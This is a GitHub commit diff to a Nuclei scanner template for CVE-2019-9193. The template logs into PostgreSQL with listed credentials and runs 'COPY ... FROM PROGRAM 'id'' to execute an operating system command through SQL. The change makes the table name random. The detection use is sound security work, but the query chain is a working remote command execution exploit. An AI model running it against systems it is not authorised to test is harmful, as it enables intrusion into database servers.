Update CVE-2019-9193.yaml

patch-1
pussycat0x 2024-04-05 15:43:06 +05:30 committed by GitHub
parent fd578f313e
commit ed3374d42e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 4 additions and 2 deletions

View File

@ -17,7 +17,8 @@ javascript:
- code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
const qry = ["CREATE TABLE cmd_exec(cmd_output text);", "COPY cmd_exec FROM PROGRAM 'id';", "SELECT * FROM cmd_exec;", "DROP TABLE IF EXISTS cmd_exec;",];
const tbl = tbl_exec
const qry = ["CREATE TABLE "+tbl+"(cmd_output text);", "COPY "+tbl + " FROM PROGRAM 'id';", "SELECT * FROM "+ tbl+";", "DROP TABLE IF EXISTS " +tbl+";",];
for (const x of qry){
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x);
Export(connected);
@ -29,6 +30,7 @@ javascript:
User: "{{usernames}}"
Pass: "{{password}}"
Db: "{{database}}"
tbl_exec: "{{randbase(5)}}"
payloads:
usernames:
@ -48,4 +50,4 @@ javascript:
- type: word
words:
- "cmd_output"
- "cmd_output"